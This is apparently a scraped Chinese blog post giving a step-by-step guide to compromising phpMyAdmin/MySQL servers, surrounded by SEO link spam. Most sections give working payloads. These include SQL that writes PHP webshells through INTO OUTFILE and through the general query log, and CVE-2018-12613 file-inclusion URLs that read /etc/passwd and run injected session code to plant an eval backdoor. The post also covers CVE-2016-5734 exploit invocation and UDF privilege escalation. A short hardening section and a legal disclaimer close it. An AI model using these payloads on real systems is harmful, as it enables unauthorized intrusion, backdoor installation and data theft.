当前位置: 首页 > wzjs >正文

网站制作和优化专注于seo顾问

网站制作和优化,专注于seo顾问,雪军miui一键优化,深圳做网站收费目录 一、信息收集与漏洞探测 1. 获取关键信息 2. 权限验证 3. 漏洞扫描 二、历史漏洞利用方法 1. 写入 Webshell 到了这个地步密码探索 2. 远程代码执行(RCE) 3. 提权与后渗透 4. 文件包含漏洞 三、高危历史漏洞列表 四、防御与加固建议 五…

目录

一、信息收集与漏洞探测

1. 获取关键信息

2. 权限验证

3. 漏洞扫描

二、历史漏洞利用方法

1. 写入 Webshell

到了这个地步密码探索

2. 远程代码执行(RCE)

3. 提权与后渗透

4. 文件包含漏洞

三、高危历史漏洞列表

四、防御与加固建议

五、提醒


一、信息收集与漏洞探测

1. 获取关键信息
  • 版本信息:访问 /readme.php/changelog.php 等路径,或查看 /doc/html/index.html 获取版本号,判断是否存在已知漏洞。
  • 绝对路径获取
    • 通过 phpinfo() 页面或报错信息(如注入单引号导致错误)暴露路径。
    • 使用 SHOW VARIABLES LIKE '%datadir%'; 查看数据库路径,推测 Web 目录(如 /var/www/html)。
    • 利用 SELECT load_file('/etc/passwd'); 读取系统文件。

2. 权限验证
  • 检查写入权限
    SHOW VARIABLES LIKE 'secure_file_priv';
    
    • 若值为空,可写入任意目录;若为 /tmp/,仅限该目录。
  • 用户权限:执行 SHOW GRANTS; 确认是否为 root 或高权限账户。

3. 漏洞扫描
  • 已知漏洞探测
    • 本地文件包含:测试 gis_data_editor.php?gis_data[gis_type]=/../../../../etc/passwd%00(需有效 token)。
    • 反序列化漏洞:发送特定 POST 请求尝试读取 /etc/passwd(适用于 phpMyAdmin 2.x)。
    • 跨站请求伪造 (CSRF):构造恶意链接诱导管理员执行 SQL 操作(如删除数据库)。

二、历史漏洞利用方法

1. 写入 Webshell
  • 直接写入
    SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
    
    • 需满足:secure_file_priv 为空且已知 Web 路径。

  • 通过日志记录 PHP 代码生成后门。
  • 开启/关闭情况以及日志存储文件的位置

    • 得知 通过日志我们就可以进行其它渗透行为

Show variables like "general_log%"
  • 日志文件写入
SET GLOBAL general_log = 'ON';  设置打开日志
SET GLOBAL general_log_file =  "C:\\phpStudy\\www\\shell.php"; 日志记录的位置
SELECT '<?php eval($_POST["cmd"]); ?>'; 写入一句话木马
select "<?php system($_REQUEST[cmd]);?>" 系统执行命令
​
show variables like "general_log%" 来验证上述修改是否成功 ​

  • 植入木马后查看dir文件路径:
http://192.168.111.133/shell.php?cmd=dir

  • 执行了dir命令发现yxcms,从这个命令像cms系统,我们试一下访问一下:


  • 到了这个地步密码探索
    • 从页面信息角度收集信息

2. 远程代码执行(RCE)
  • CVE-2016-5734(phpMyAdmin 4.3.0-4.6.2):
    • 利用 preg_replace 的 /e 修饰符漏洞执行命令:
      python3 exploit.py -u root -p root -d test -c "system('id');" http://target.com
      
  • CVE-2018-12613(phpMyAdmin 4.8.0-4.8.1):
    • 构造 URL 包含远程文件或本地 Session 文件(需二次编码绕过检查):
      /index.php?target=db_sql.php%253f/../../../../tmp/sess_[session_id]
      
3. 提权与后渗透
  • UDF 提权(Windows/Linux):
    • 上传自定义 DLL/SO 文件到插件目录,创建函数执行系统命令:
      CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll';
      SELECT sys_eval('whoami');
      
  • MOF 提权(Windows ≤ 2003):
    • 利用 MySQL 写入恶意 MOF 文件,系统每 5 秒执行一次命令。
4. 文件包含漏洞
  • phpmyadmin 4.8
  • 
    http://192.168.96.133:2003/index.php?target=db_datadict.php%253f/../../../../../../../../etc/passwd

  • 可以通过文件包含漏洞获取服务器权限,我们在选择sql菜单,然后在sql输入如下命令。

  • select "<?php echo 'pwd';?>"

  • 执行sql语句会保存在PHPMyAdmin的临时session文件中

  • 临时的session文件名称可通过bp抓取数据包获得

  • 抓取任意数据包,数据包中Cookie字段phpMyAdmin值加上前追sess_就是临时session文件名

  • Cookie: phpMyAdmin=4a6dfc78f1c64493821a0c327bbca5e6; pma_lang=zh_CN

  • http://192.168.96.133:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_4a6dfc78f1c64493821a0c327bbca5e6

  • 这个时候<?php echo 'pwd';?>会以php代码的形式执行。在文件包好url的访问结果中【文件包含漏洞】我们可以获得服务器执行的pwd结果 我们知道当前的路径是/var/www/html[执行一句话木马的位置]

  • select '<?php echo `echo "<?php eval($_POST[Skull.]);?>" > /var/www/html/11113.php`;?>';

    select '<?php echo `echo "<?php eval($_POST[Skull.]);?>" > /var/www/html/11113.php`;?>';
    http://192.168.96.133:2003/1111.php

三、高危历史漏洞列表

漏洞编号影响版本利用方式修复建议
CVE-2018-199684.0-4.8.3本地文件包含读取敏感信息升级至 4.8.4+
CVE-2016-57344.3.0-4.6.2后台命令执行(需 PHP <5.4.7)升级至 4.6.3+
CVE-2018-126134.8.0-4.8.1远程文件包含升级至 4.8.2+
WooYun-2016-1994332.x反序列化任意文件读取禁用旧版本
CVE-2010-30552.11.x <2.11.10.1通过 setup.php 执行任意代码升级至 2.11.10.1+

四、防御与加固建议

  1. 访问控制

    • 限制 phpMyAdmin 仅允许内网或 VPN 访问,禁用外网暴露。
    • 启用多因素认证(如 Google Authenticator)。
  2. 权限最小化

    • 为 MySQL 分配非 root 用户,禁用 FILE 和 EXECUTE 权限。
    • 配置 secure_file_priv 限制文件读写目录。
  3. 安全更新

    • 及时升级至最新版本(当前最新为 phpMyAdmin 5.2.1)。
  4. 日志与监控

    • 开启审计日志,监控异常 SQL 操作(如 INTO OUTFILE)。
  5. 代码加固

    • 禁用危险函数(如 eval()system())。
    • 使用 Web 应用防火墙(WAF)拦截恶意请求。

五、提醒

  • 合法授权:所有操作需在授权范围内进行,非法入侵将面临法律风险。
  • 漏洞报告:发现漏洞应通过合规渠道上报(如 CVE、CNVD)。

http://www.dtcms.com/wzjs/46352.html

相关文章:

  • 做网站公司项目的流程公司网页制作流程
  • 网站域名登录不了百度导航2023年最新版
  • 疫情防控措施调整常州网站优化
  • 做电话销售需要的网站seo专业培训需要多久
  • 深圳网站制作品牌祥奔科技产品推广活动策划方案
  • wordpress 站点地址 wordpress地址网站流量来源
  • 网页设计和网站建设的区别成都网络营销搜索推广
  • 电子商城网站开发 pdf百度推广登录入口电脑
  • 建设银行流水假的真伪查询网站关键词推广和定向推广
  • 某学校网站建设方案论文账户竞价托管哪里好
  • 使用tag的网站专业网络推广外包
  • 可以做彩票网站的工作室来宾seo
  • 建设工程规划许可证查询网站集合竞价口诀背熟6句
  • 做电影网站的资源从哪里换miy188coo免费入口
  • 动态网站开发案例实训总结6微博seo排名优化
  • 广州行业门户网站建设做一个电商平台大概需要多少钱
  • 动态网站设计都有什么属性百度2019旧版本下载
  • 高端网站定制设计公司模板建站平台
  • 网站开发建设价格附件自媒体十大平台
  • 公司做网站找谁公司做网站找谁网站推广计划书范文
  • 网页设计教程详细步骤南京seo域名
  • 金融网站建设多少钱百度指数怎么做
  • 网站项目报价单模板开封网站优化公司
  • idc 公司网站模板手机怎么创建自己的网站平台
  • 响应式网站模板html5接单平台
  • 保定市建设局质监站网站抖音指数
  • 哪个网站好自建站怎么推广
  • 网络购物系统标题优化
  • 艺术网站欣赏香港疫情最新情况
  • 合肥建设网网站百度指数是啥